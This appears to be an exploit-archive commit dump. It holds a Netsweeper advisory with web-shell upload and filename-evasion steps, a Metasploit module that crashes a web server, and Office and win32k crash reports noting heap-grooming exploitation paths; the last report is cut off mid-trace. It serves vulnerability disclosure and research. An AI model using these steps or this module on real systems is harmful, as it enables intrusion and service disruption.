CVE : CVE-2014-9619
+---------------------+
+ Product Description +
+---------------------+
Netsweeper is a software solution specialized in content filtering.
+----------------------+
+ Exploitation Details +
+----------------------+
Netsweeeper 4.0.8 (and probably other versions) allows an authenticated user with admin privileges on the Cloud Manager web console, to upload arbitrary PHP code (eg PHP shell) and further execute it.
To replicate the bug, pipe the following request while being authenticated using admin privileges: http://netsweeper/webadmin/ajaxfilemanager/ajaxfilemanager.php
From the response page you can upload any GIF-lookalike php shell (remember to use basic evasion technique for file to upload successfully, hint: filename="secuid0.php.gif" with gif like header and php shell following)
Then, access your shell from: https://netsweeper/webadmin/deny/images/secuid0.php.gif and profit.
+----------+
+ Solution +
+----------+
Upgrade to latest version.
+---------------------+
+ Disclosure Timeline +
+---------------------+
24-Nov-2014: Initial Communication
03-Dec-2014: Netsweeper responded
03-Dec-2014: Shared full details to replicate the issue
10-Dec-2014: Netsweeper fixed the issue in releases 3.1.10, 4.0.9, 4.1.2
17-Dec-2014: New releases 3.1.10, 4.0.9, 4.1.2 made available to the public
18-Dec-2014: Confirm fix
17-Jan-2015: CVE assigned CVE-2014-9619
11-Aug-2015: Public disclosure

54
platforms/windows/dos/37905.rb Executable file
View file

@ -0,0 +1,54 @@
source: http://www.securityfocus.com/bid/55761/info
PowerTCP WebServer for ActiveX is prone to a remote denial-of-service vulnerability.
Attackers can exploit this issue to crash the application (typically Internet Explorer), denying service to legitimate users.
PowerTCP WebServer for ActiveX 1.9.2 is vulnerable; other versions may also be affected.
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Description' => %q{ 'Name' => 'Dart Webserver
<= 1.9.0 Stack Overflow',
Dart Webserver from Dart Communications throws a stack
overflow exception
when processing large requests.
}
,
'Author' => [
'catatonicprime'
],
'Version' => '$Revision: 15513 $',
'License' => MSF_LICENSE,
'References' => [
[ 'CVE', '2012-3819' ],
],
'DisclosureDate' => '9/28/2012'))
register_options([
Opt::RPORT(80),
OptInt.new('SIZE', [ true, 'Estimated stack size to exhaust',
'520000' ])
])
end
def run
serverIP = datastore['RHOST']
if (datastore['RPORT'].to_i != 80)
serverIP += ":" + datastore['RPORT'].to_s
end
size = datastore['SIZE']
print_status("Crashing the server ...")
request = "A" * size + "\r\n\r\n"
connect
sock.put(request)
disconnect
end
end

96
platforms/windows/dos/37909.txt Executable file
View file

@ -0,0 +1,96 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=424&can=1
The following crash was observed in Microsoft Office 2007 with Microsoft Office File Validation Add-In disabled and Application Verifier enabled for testing and reproduction. This bug also reproduced in Office 2010 running on Windows 7 x86.
The crash is caused by a 1 bit delta from the original file at offset 0x31B. OffViz identified this offset as WordBinaryDocuments[1].WordBinaryDocument[0].WordFIB.FIBTable97.fcPlcfFldMom with an original value of 0x000072C6 and a fuzzed value of 0x00007AC6.
Attached files:
Fuzzed minimized PoC: 2509821532_min.doc
Fuzzed non-minimized PoC: 2509821532_crash.doc
Original non-fuzzed file: 2509821532_orig.doc
DLL Versions:
wwlib.dll: 12.0.6720.5000
msptls.dll: 12.0.6682.5000
Observed Crash:
eax=00000008 ebx=037bbec4 ecx=0f67df76 edx=c0c0c106 esi=00000000 edi=0012caec
eip=3124d7d4 esp=0012c9d8 ebp=0012c9e0 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210202
3124d7ca 8b4d0c mov ecx,dword ptr [ebp+0Ch]
3124d7cd 8b5508 mov edx,dword ptr [ebp+8]
3124d7d0 56 push esi
3124d7d1 57 push edi
3124d7d2 7214 jb wwlib!FMain+0x9231 (3124d7e8)
=> 3124d7d4 8b32 mov esi,dword ptr [edx] ds:0023:c0c0c106=????????
3124d7d6 3b31 cmp esi,dword ptr [ecx]
0:000> kb L8
ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
0012c9e0 3165adbb c0c0c106 0f67df76 00000008 wwlib!FMain+0x921d
0012c9f4 6bdd19f7 3211e7e0 c0c0c0c0 0f67df30 wwlib!DllGetLCID+0x1e64e5
0012caa8 6bdd24c8 0000000f 0012cd90 00127965 MSPTLS!LssbFIsSublineEmpty+0x1f3f
0012cb28 6bddf8e0 00000000 0012cd90 00000000 MSPTLS!LssbFIsSublineEmpty+0x2a10
0012cb8c 6bddff5d 037bbec0 00000000 0012cdb4 MSPTLS!LssbFIsSublineEmpty+0xfe28
0012cbbc 6bddf1ef 00000000 00000000 0ee10fa0 MSPTLS!LssbFIsSublineEmpty+0x104a5
0012cdc0 6bdc4b85 0304a320 00000bc1 00116333 MSPTLS!LssbFIsSublineEmpty+0xf737
0012cdf4 312dbeea 0304a320 00000bc1 00116333 MSPTLS!LsCreateLine+0x23
The value in edx is an application verifier canary value for uninitialized heap data. Looking back up the call stack we can see the instruction that pushed this value:
6bdd19de 8d45d0 lea eax,[ebp-30h]
6bdd19e1 50 push eax
6bdd19e2 ff7704 push dword ptr [edi+4]
6bdd19e5 8b45f8 mov eax,dword ptr [ebp-8]
=> 6bdd19e8 ff704c push dword ptr [eax+4Ch]
6bdd19eb 8b45fc mov eax,dword ptr [ebp-4]
6bdd19ee ff7004 push dword ptr [eax+4]
6bdd19f1 ff908c000000 call dword ptr [eax+8Ch] ds:0023:025ac3ac=3165ada3
6bdd19f7 3bc6 cmp eax,esi
Examining memory at [ebp-8] we see:
0:000> dds poi(ebp-8)-4
11c22cb4 11c22d2c # pointer to next heap chunk
11c22cb8 4e44534c # tag NDSL (eax points here)
11c22cbc 11c22d30 # flink?
11c22cc0 11c22c40 # blink?
11c22cc4 00000aea
11c22cc8 00000aea
11c22ccc 02642ec4
11c22cd0 00000000
11c22cd4 00000000
11c22cd8 00000aea
11c22cdc 00000000
11c22ce0 00000aea
11c22ce4 00000000
11c22ce8 00000000
11c22cec c0c0c0c0
11c22cf0 c0c0000d
11c22cf4 00001800
11c22cf8 00000000
11c22cfc 00001800
11c22d00 00000000
11c22d04 c0c0c0c0 # pushed value (eax+4ch) uninitialized
11c22d08 c0c0c0c0
11c22d0c c0c0c0c0
11c22d10 c0c0c0c0
11c22d14 c0c0c0c0
11c22d18 c0c0c0c0
11c22d1c c0c0c0c0
11c22d20 c0c0c0c0
11c22d24 c0c0c0c0
11c22d28 c0c0c0c0
11c22d2c 11c22da4 # start of next heap chunk
11c22d30 4e44534c
An attacker may control the uninitialized value by first allocating a heap chunk of the same size such that it will land in the same spot as the above chunk. The attacker can write data to the +4ch offset and then free the chunk back to the system. The attacker will then have control over the pointer in eax+4ch when it is used during . If this points to a valid page it will survive the dereferences in the crashing path. It did not look as though there was an immediately path to cause an out of bounds memory write. However, it is likely that this attacker controlled pointer will need to be free-ed later in execution.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37909.zip

88
platforms/windows/dos/37910.txt Executable file
View file

@ -0,0 +1,88 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=423&can=1
The following crash was observed in Microsoft Office 2007 with Microsoft Office File Validation Add-In disabled and Application Verifier enabled for testing and reproduction. This bug also reproduced in Office 2010 running on Windows 7 x86.
The minimized version of the PoC has three deltas at offsets 0x2404, 0x4041, and 0x8057. OffViz identified these as WordBinaryDocuments[1].WordBinaryDocument[0].stPapxFKPs[23].PAPXFKP[1].rgfc[7].rgfc[1], WordBinaryDocuments[1].WordBinaryDocument[0].stPapxFKPs[23].PAPXFKP[9].rgfc[23].rgfc[16], and WordBinaryDocuments[1].WordBinaryDocument[0].stPapxFKPs[23].PAPXFKP[22].rgbx[11].BXPAP[3].bOffset respectively.
Attached files:
Fuzzed minimized PoC: 1981563878_min.doc
Fuzzed non-minimized PoC: 1981563878_crash.doc
Original non-fuzzed file: 1981563878_orig.doc
DLL Versions:
wwlib.dll: 12.0.6720.5000
mso.dll: 12.0.6721.5000
user32.dll: 5.2.3790.4033
Observed Crash:
eax=17dd0f5b ebx=17dd0f5b ecx=00010100 edx=00010400 esi=00000002 edi=0355d2e8
eip=312ab63d esp=0012dbc0 ebp=0012dbc8 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
312ab63d ffb0b8000000 push dword ptr [eax+0B8h] ds:0023:17dd1013=????????
312ab643 ffb0b0000000 push dword ptr [eax+0B0h]
312ab649 ffb0b4000000 push dword ptr [eax+0B4h]
312ab64f ffb0ac000000 push dword ptr [eax+0ACh]
312ab655 ff7518 push dword ptr [ebp+18h]
312ab658 e8edfcffff call wwlib!FMain+0x66d93 (312ab34a)
0:000> kb
ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
0012dbc8 312ab1ff 0355d2e8 0355d2e8 17dd0f5b wwlib!FMain+0x67086
0012dc80 312aad93 0355d2e4 0355d2e8 0355d2e8 wwlib!FMain+0x66c48
0012dcd4 3131b437 0355d2e4 0355d2e8 0012dd1c wwlib!FMain+0x667dc
0012dd30 3131b2e5 2b0127d9 00000000 00000001 wwlib!FMain+0xd6e80
0012e028 31302777 0355d2e4 ffffffff 32123af8 wwlib!FMain+0xd6d2e
0012e130 31304eb5 0155d2e4 00000002 00000000 wwlib!FMain+0xbe1c0
0012e164 3131a5a4 0355d2e4 00000002 0355d2e4 wwlib!FMain+0xc08fe
0012e1bc 312a2780 0355d2e4 00000002 0012e2c0 wwlib!FMain+0xd5fed
0012e248 7739b6e3 030b025a 0000000f 00000000 wwlib!FMain+0x5e1c9
0012e274 7739b874 312a2331 030b025a 0000000f USER32!InternalCallWinProc+0x28
0012e2ec 7739c8b8 00000000 312a2331 030b025a USER32!UserCallWinProcCheckWow+0x151
0012e348 7739c9c6 028c9d38 0000000f 00000000 USER32!DispatchClientMessage+0xd9
0012e370 7c8282f6 0012e388 00000018 0012e4bc USER32!__fnDWORD+0x24
0012e39c 7739cbb2 7739cb75 018e01a2 0000005e ntdll!KiUserCallbackDispatcher+0x2e
In this crash eax is coming from the 3rd argument passed into the function at 0x312ab5e7. It is pointing to valid memory allocated with the following call stack:
0:000> !heap -p -a 0x17dd0f5b
address 17dd0f5b found in
_DPH_HEAP_ROOT @ 1151000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
170a8400: 17dd0f58 a8 - 17dd0000 2000
7c83d6d4 ntdll!RtlAllocateHeap+0x00000e9f
0189fd2c vfbasics!AVrfpRtlAllocateHeap+0x000000b1
33103a8f mso!Ordinal1743+0x00002e07
329c7e66 mso!MsoPvAllocCore+0x0000005a
31249eb5 wwlib!FMain+0x000058fe
312f7a55 wwlib!FMain+0x000b349e
312f79d2 wwlib!FMain+0x000b341b
312f727e wwlib!FMain+0x000b2cc7
The indexes being pushed onto the stack eax +0xB8, +0xB0, +0xB4, and +0xAC push the value beyond the allocated size of a8. With pageheap enabled this causes a fault at the first push. This is an exploitable bug because the function at 0x312ab34a uses these values in memory write operations:
0:000> uf 312ab34a
wwlib!FMain+0x66d93:
312ab34a 55 push ebp
312ab34b 8bec mov ebp,esp
312ab34d 8b4508 mov eax,dword ptr [ebp+8]
312ab350 8b4d0c mov ecx,dword ptr [ebp+0Ch]
312ab353 8b5510 mov edx,dword ptr [ebp+10h]
=> 312ab356 2908 sub dword ptr [eax],ecx
=> 312ab358 015008 add dword ptr [eax+8],edx
312ab35b 8b4d14 mov ecx,dword ptr [ebp+14h]
312ab35e 8b5518 mov edx,dword ptr [ebp+18h]
=> 312ab361 294804 sub dword ptr [eax+4],ecx
=> 312ab364 01500c add dword ptr [eax+0Ch],edx
312ab367 5d pop ebp
312ab368 c21400 ret 14h
At attacker may control these values by grooming memory so that he or she controls the memory after the a8 sized chunk. This can lead to memory corruption and arbitrary code execution. The root cause of this bug suggestive of a type confusion vulnerability earlier in the call stack but this has not been determined with certainty.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37910.zip

69
platforms/windows/dos/37911.txt Executable file
View file

@ -0,0 +1,69 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=420&can=1
The following crash was observed in Microsoft Office 2007 with Microsoft Office File Validation Add-In disabled and Application Verifier enabled for testing and reproduction. This bug also reproduced in Office 2010 running on Windows 7 x86.
The crash is caused by a 1 bit delta from the original file at offset 0x4A45. OffViz identified this offset as OLESSRoot.DirectoryEntries[100].OLESSDirectoryEntry[20].sidLeft with an original value of 0x00000000 and a fuzzed value of 0x00008000.
Attached files:
Fuzzed minimized PoC: 1863274449_min.doc
Fuzzed non-minimized PoC: 1863274449_crash.doc
Original non-fuzzed file: 1863274449_orig.doc
DLL Versions:
OGL.dll: 12.0.6719.5000
wwlib.dll: 12.0.6720.5000
GDI32.dll: 5.2.3790.5563
eax=ffff0002 ebx=12b85fd8 ecx=fffff975 edx=fffc0008 esi=ffff8000 edi=12b81f50
eip=3bd186a1 esp=00129f68 ebp=00129f98 iopl=0 nv up ei ng nz na po cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010283
3bd1869c 8bd0 mov edx,eax
3bd1869e c1e202 shl edx,2
OGL!DpOutputSpanStretch<1>::OutputSpan+0x13e:
3bd186a1 890c1a mov dword ptr [edx+ebx],ecx ds:0023:12b45fe0=????????
0:000> kb L8
ChildEBP RetAddr Args to Child
00129f98 3be70c01 0000014c 000001d9 00000267 OGL!DpOutputSpanStretch<1>::OutputSpan+0x13e
00129fcc 3be6f93d 0000014c 000001d9 00000267 OGL!EpAntialiasedFiller::OutputSpan+0x2f
00129ff0 3be70ba0 0000014c 000001d9 00000267 OGL!DpClipRegion::OutputSpan+0x84
0012a010 3be6e30c 0000014c 0012aa38 00000533 OGL!EpAntialiasedFiller::GenerateOutputAndClearCoverage+0x62
0012a038 3be7052c 00000533 000001e6 00000798 OGL!EpAntialiasedFiller::FillEdgesAlternate+0x102
0012a050 3be6f8a0 7fffffff 0012a0ac 00000000 OGL!RasterizeEdges+0xa7
0012ab08 3bd43c10 0012abc0 0012ab3c 3be70d78 OGL!RasterizePath+0x2ce
0012acf4 3be4cd7e 1292eda8 0012ae10 122f2f98 OGL!DpDriver::DrawImage+0x230
In this crash ebx is pointing to valid memory allocated from OGL!DpOutputSpanStretch<1>::InitializeClass with a size of 24. However, the edx value appears to have a sign extension issue leading to an out of bounds write. When eax was moved to edx at 0x3bd1869c eax already appeared to have sign extended value (0xffff0002). Eax is being updated in a loop in this function starting at 0x3bdb94d5. The value originally comes from [edi+9ch]. This will be set to 0xffff0002 on the crashing iteration. The offset at [edi+9ch] is updated at 0x3be18b37 and 0x3be18b49. Tracing back from these writes just a bit further we can step through the crux of the issue during the first loop iteration:
eax=800182ae ebx=000100d7 ecx=8004845a edx=00008005 esi=80008100 edi=128a1f50
eip=3bdb946a esp=00129f68 ebp=00129f98 iopl=0 ov up ei ng nz ac pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000a96
OGL!DpOutputSpanStretch<1>::OutputSpan+0x65:
3bdb946a c1f910 sar ecx,10h
0:000> p
eax=800182ae ebx=000100d7 ecx=ffff8004 edx=00008005 esi=80008100 edi=128a1f50
eip=3bdb946d esp=00129f68 ebp=00129f98 iopl=0 nv up ei ng nz na po cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000283
OGL!DpOutputSpanStretch<1>::OutputSpan+0x68:
3bdb946d c1fe10 sar esi,10h
0:000> p
eax=800182ae ebx=000100d7 ecx=ffff8004 edx=00008005 esi=ffff8000 edi=128a1f50
eip=3bdb9470 esp=00129f68 ebp=00129f98 iopl=0 nv up ei ng nz na pe cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000287
OGL!DpOutputSpanStretch<1>::OutputSpan+0x6b:
3bdb9470 81faffffff7f cmp edx,7FFFFFFFh
The sar instruction applied to ecx and esi will sign extend the values in these registers. If this is allowed to happen there must be a check to ensure that the resulting values are still in range to the allocated heap buffer.
To get your debugger to the correct spot given the attached PoC realize that there are two DpOutputSpanStretch object created before the crash. The first one is of no consequence. The OutputSpan function is also called twice on this new object before entering the crashing state. I suggest using a conditional breakpoint to get to the correct spot:
bp 3bdb946d ".if (@esi & 0x`ffffffff) = 0x`80008100 {} .else{gc}"
This crash is writing to a memory address out-of-bound to the allocated buffer, therefore this is an exploitable vulnerability.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37911.zip

71
platforms/windows/dos/37912.txt Executable file
View file

@ -0,0 +1,71 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=417&can=1
The following crash was observed in Microsoft Office 2007 with Microsoft Office File Validation Add-In disabled and Application Verifier enabled for testing and reproduction. This bug did not reproduce in Office 2010 running on Windows 7 x86. The attached PoC file will reproduce when Word is closed. However, there were other crashing files (not attached) faulting on the same EIP that did not require Word to be be closed to trigger the crash. This particular PoC did not minimize cleanly and has 666 deltas from the original non-fuzzed file.
Attached files:
Fuzzed non-minimized PoC: 2435406723_crash.doc
Original non-fuzzed file: 2435406723_orig.doc
DLL Versions:
mso.dll: 12.0.6721.5000
wwlib.dll: 12.0.6720.5000
Observed Crash:
eax=0012bd13 ebx=000008ac ecx=00000003 edx=334b9dbc esi=00019910 edi=00000000
eip=329dc5b6 esp=0012bd04 ebp=0012bd08 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
mso!Ordinal649:
329dc5a3 55 push ebp
329dc5a4 8bec mov ebp,esp
329dc5a6 56 push esi
329dc5a7 8b7508 mov esi,dword ptr [ebp+8]
329dc5aa 85f6 test esi,esi
329dc5ac 742b je mso!Ordinal649+0x36 (329dc5d9)
329dc5ae 8d4d0b lea ecx,[ebp+0Bh]
329dc5b1 e8aad2feff call mso!Ordinal6797+0xa8 (329c9860)
=> 329dc5b6 ff36 push dword ptr [esi] ds:0023:00019910=????????
329dc5b8 e8d5cbfeff call mso!MsoFreePv (329c9192)
0:000> kb 8
ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
0012bd08 31252d68 00019910 0db269c0 0012bd54 mso!Ordinal649+0x13
0012bd18 31339e69 0db26f94 0db269c0 035784cc wwlib!FMain+0xe7b1
0012bd54 31338a56 00000000 00000080 035784cc wwlib!FMain+0xf58b2
0012bda4 313385a6 0db269c0 00000800 00000000 wwlib!FMain+0xf449f
0012bdc4 31337401 00000000 00000800 9d186de9 wwlib!FMain+0xf3fef
0012be2c 3133720b 00000000 0db269c0 00000000 wwlib!FMain+0xf2e4a
0012ceac 3134d981 00d20192 00000000 00000001 wwlib!FMain+0xf2c54
0012cf40 7739b6e3 00d20192 00000010 00000000 wwlib!FMain+0x1093ca
The value in esi is coming from [arg0+5d4] in the calling function. This value was set in a different code path. If we find where arg0 was originally allocated and set a memory write hardware breakpoint on that location we can find several writes to this location. The value 00019910 is set from the following code:
eax=00019910 ebx=00000038 ecx=00000000 edx=00000003 esi=0da3e9c0 edi=0da3ef98
eip=3128d559 esp=0012cacc ebp=0012caf8 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
0:000> kb L8
ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
0012caf8 3128d49e 00000000 0000000a aae8528c wwlib!FMain+0x48fa2
0012cc44 31497035 0da3e9c0 0001a1ab 00000000 wwlib!FMain+0x48ee7
0012cd38 3149812e 0da3e9c0 0001a1ab 0012d050 wwlib!DllGetLCID+0x2275f
0012d4a8 31497d09 0da3e9c0 0001a1ab 3211f0e4 wwlib!DllGetLCID+0x23858
0012d830 31498500 3211e7e0 80000001 0001a1ab wwlib!DllGetLCID+0x23433
0012dcac 6bdd1fb9 3211e7e0 0012dd4c 0012dd08 wwlib!DllGetLCID+0x23c2a
0012dd70 6bddfb4b 021aeec4 0012df80 0012ddac MSPTLS!LssbFIsSublineEmpty+0x2501
0012dd80 6bddff92 00000000 0012dfa4 0012df7c MSPTLS!LssbFIsSublineEmpty+0x10093
3128d54a 2bc8 sub ecx,eax
3128d54c 8dbc86ac050000 lea edi,[esi+eax*4+5ACh]
3128d553 8b45f4 mov eax,dword ptr [ebp-0Ch]
3128d556 41 inc ecx
=> 3128d557 f3ab rep stos dword ptr es:[edi]
3128d559 837deeff cmp dword ptr [ebp-12h],0FFFFFFFFh ss:0023:0012cae6=00019427
To exploit this bug an attacker must spray memory until virtual address 0x00019000 is reserved and committed into the running process. Then, at offset 0x910 in that page the attacker must place any address he or she wishes to free. This will lead to an exploitable arbitrary free vulnerability.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37912.zip

67
platforms/windows/dos/37913.txt Executable file
View file

@ -0,0 +1,67 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=414&can=1
The following crash was observed in MS Office 2007 running under Windows 2003 x86. Microsoft Office File Validation Add-In is disabled and application verified was enabled for testing and reproduction. This sample did not reproduce in Office 2010 running on Windows 7 x86.
The attached minimized PoC that produces the crash with 2 bit changes from the original file at offsets 0x11E60 and 0x1515F. Standard office document parsers did not reveal any significance about this location.
Attached files:
Fuzzed minimized PoC: 1567070353_min.doc
Fuzzed non-minimized PoC: 1567070353_crash.doc
Original non-fuzzed file: 1567070353_orig.doc
DLL Versions:
mso.dll: 12.0.6721.5000
wwlib.dll: 12.0.6720.5000
Observed Crash:
eax=00000001 ebx=00000004 ecx=0189ff18 edx=00000019 esi=32646a30 edi=0db0eff8
eip=32fbca76 esp=0012bc98 ebp=0012bcb8 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
32fbca73 8b7df8 mov edi,dword ptr [ebp-8]
=> 32fbca76 f6470201 test byte ptr [edi+2],1 ds:0023:0db0effa=??
32fbca7a 7419 je mso!Ordinal2690+0x476 (32fbca95)
32fbca7c 833e07 cmp dword ptr [esi],7
32fbca7f 7414 je mso!Ordinal2690+0x476 (32fbca95)
32fbca81 8b4508 mov eax,dword ptr [ebp+8]
32fbca84 6a20 push 20h
32fbca86 ff7010 push dword ptr [eax+10h]
32fbca89 8d4dfc lea ecx,[ebp-4]
32fbca8c 51 push ecx
32fbca8d ff10 call dword ptr [eax]
32fbca8f 8127fffffeff and dword ptr [edi],0FFFEFFFFh
Stack Trace:
0:000> kb 8
ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
0012bcb8 32fbcdc3 0012be28 0d9f4fe8 00000000 mso!Ordinal2690+0x457
0012bccc 32fbce5b 0012be28 0d9f4fe8 0012be28 mso!Ordinal2690+0x7a4
0012bd20 32fbc93e 0012be28 0d9f4fe8 0ddceeb8 mso!Ordinal2690+0x83c
0012bd74 32fbcd73 0012be28 0d9f4fe8 0db2f45a mso!Ordinal2690+0x31f
0012bd94 316dfe8f 0dbe8e38 0012be28 317e9c10 mso!Ordinal2690+0x754
0012bdb0 317e9aa4 0012be08 00000000 00000000 wwlib!wdCommandDispatch+0xcd37
0012bde4 31980e8d 0012be08 000000b4 038b78bc wwlib!wdCommandDispatch+0x11694c
0012c07c 31980b0f 0db2c9c0 00000000 00000001 wwlib!wdCommandDispatch+0x2add35
In this crash the value being dereferenced in edi is free-ed memory:
0:000> !heap -p -a 0xdb0eff8
address 0db0eff8 found in
_DPH_HEAP_ROOT @ 1151000
in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)
d9e5240: db0e000 2000
7c83e330 ntdll!RtlFreeHeap+0x0000011a
0189fe9c vfbasics!AVrfpRtlFreeHeap+0x000000f8
331039d5 mso!Ordinal1743+0x00002d4d
329c91d1 mso!MsoFreePv+0x0000003f
329c913c mso!Ordinal519+0x00000017
32a54dcc mso!Ordinal320+0x00000021
32bb6f2e mso!Ordinal379+0x00000eae
There is a 1-bit clear at the location specified by edi shortly after the faulting eip location as well making this an exploitable condition.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37913.zip

77
platforms/windows/dos/37914.txt Executable file
View file

@ -0,0 +1,77 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=402&can=1
We have encountered a Windows kernel crash in the win32k!fsc_BLTHoriz function while processing corrupted TTF font files, such as:
---
DRIVER_PAGE_FAULT_BEYOND_END_OF_ALLOCATION (d6)
N bytes of memory was allocated and more than N bytes are being referenced.
This cannot be protected by try-except.
When possible, the guilty driver's name (Unicode string) is printed on
the bugcheck screen and saved in KiBugCheckDriver.
Arguments:
Arg1: fbde5000, memory referenced
Arg2: 00000001, value 0 = read operation, 1 = write operation
Arg3: 8209f076, if non-zero, the address which referenced memory.
Arg4: 00000000, (reserved)
Debugging Details:
------------------
Could not read faulting driver name
WRITE_ADDRESS: GetPointerFromAddress: unable to read from 8279284c
Unable to read MiSystemVaType memory at 82771f00
fbde5000
FAULTING_IP:
win32k!fsc_BLTHoriz+37
8209f076 0908 or dword ptr [eax],ecx
MM_INTERNAL_CODE: 0
DEFAULT_BUCKET_ID: VISTA_DRIVER_FAULT
BUGCHECK_STR: 0xD6
PROCESS_NAME: csrss.exe
CURRENT_IRQL: 0
LAST_CONTROL_TRANSFER: from 8209c56b to 8209f076
STACK_TEXT:
8943f600 8209c56b fbde4fe0 000000d8 8943f6b8 win32k!fsc_BLTHoriz+0x37
8943f638 820b45f5 fbde4fe0 00000002 fffffffe win32k!fsc_FillBitMap+0xe7
8943f698 820b3eb2 ff6df874 50000061 00000002 win32k!fsc_FillGlyph+0x45e
8943f6e8 820b9ca7 ff6df010 ff6df07c fbc74f24 win32k!fs_ContourScan+0x55d
8943f82c 820aec63 00000014 0000007f 8943f918 win32k!lGetGlyphBitmap+0x179
8943f850 820aeab6 00000000 00000001 0000007f win32k!ttfdQueryFontData+0x158
8943f8a0 820adce2 ff7af010 fbc74cf0 00000001 win32k!ttfdSemQueryFontData+0x45
8943f8e8 820b3774 ff7af010 fbc74cf0 00000001 win32k!PDEVOBJ::QueryFontData+0x3e
8943f960 8212bc8d 8943fc3c fc5e4bd4 ff6d57e8 win32k!xInsertMetricsPlusRFONTOBJ+0x120
8943f990 820a594d 00000008 ff7bf030 8943fcd6 win32k!RFONTOBJ::bGetGlyphMetricsPlus+0x179
8943f9c8 8212b78b 8943fc1c 8943fc3c 00000008 win32k!ESTROBJ::vCharPos_H3+0xf0
8943fa0c 820a55d0 8943fcd0 00000008 8943fc1c win32k!ESTROBJ::vInit+0x268
8943fc2c 820a5793 00000000 8943fcd0 fbc74cf0 win32k!GreGetTextExtentExW+0x12a
8943fd0c 82665896 030102cd 00710bb0 00000008 win32k!NtGdiGetTextExtentExW+0x141
8943fd0c 773f70f4 030102cd 00710bb0 00000008 nt!KiSystemServicePostCall
WARNING: Frame IP not in any known module. Following frames may be wrong.
0027f6cc 00000000 00000000 00000000 00000000 0x773f70f4
---
While we have not determined the specific root cause of the vulnerability, we have pinpointed the offending mutations to reside in the "fpgm", "hmtx" and "maxp" tables.
The issue reproduces on Windows 7 and 8.1. It is easiest to reproduce with Special Pools enabled for win32k.sys (leading to an immediate crash when the bug is triggered), but it is also possible to observe a crash on a default Windows installation in win32k!fsc_RemoveDups or another location in kernel space. Interestingly, the crash occurs in different win32k.sys functions depending on the operating system:
Windows 7 32-bit: win32k!fsc_BLTHoriz
Windows 7 64-bit: win32k!fsc_MeasureGlyph
Windows 8 32-bit: win32k!fsg_CopyFontProgramResults
In order to reproduce the problem with the provided sample, it might be necessary to use a custom program which displays all of the font's glyphs at various point sizes.
Attached is a proof of concept font file together with the corresponding kernel crash log.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37914.zip

70
platforms/windows/dos/37915.txt Executable file
View file

@ -0,0 +1,70 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=401&can=1
We have encountered a Windows kernel crash in the win32k!fsc_RemoveDups function while processing corrupted TTF font files, such as:
---
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: ff6e7000, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: 91e809df, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000000, (reserved)
Debugging Details:
------------------
Could not read faulting driver name
READ_ADDRESS: GetPointerFromAddress: unable to read from 8277c84c
Unable to read MiSystemVaType memory at 8275bf00
ff6e7000
FAULTING_IP:
win32k!fsc_RemoveDups+85
91e809df 3918 cmp dword ptr [eax],ebx
MM_INTERNAL_CODE: 0
DEFAULT_BUCKET_ID: VISTA_DRIVER_FAULT
BUGCHECK_STR: 0x50
PROCESS_NAME: csrss.exe
CURRENT_IRQL: 0
LAST_CONTROL_TRANSFER: from 91e8015c to 91e809df
STACK_TEXT:
969e3624 91e8015c 969e3858 fbff0e78 0000002b win32k!fsc_RemoveDups+0x85
969e36cc 91e89979 ff6de010 ff6de07c 00000001 win32k!fs_FindBitMapSize+0x2de
969e36e8 91e89b59 fbff0e78 0000002b 00000001 win32k!bGetGlyphMetrics+0x39
969e382c 91e7ec63 fbff0e78 0000002b 969e3918 win32k!lGetGlyphBitmap+0x2b
969e3850 91e7eab6 00000000 00000001 0000002b win32k!ttfdQueryFontData+0x158
969e38a0 91e7dce2 ff7af010 fbe0ccf0 00000001 win32k!ttfdSemQueryFontData+0x45
969e38e8 91e83774 ff7af010 fbe0ccf0 00000001 win32k!PDEVOBJ::QueryFontData+0x3e
969e3960 91efbc8d 969e3c3c fbe2cc94 ff713154 win32k!xInsertMetricsPlusRFONTOBJ+0x120
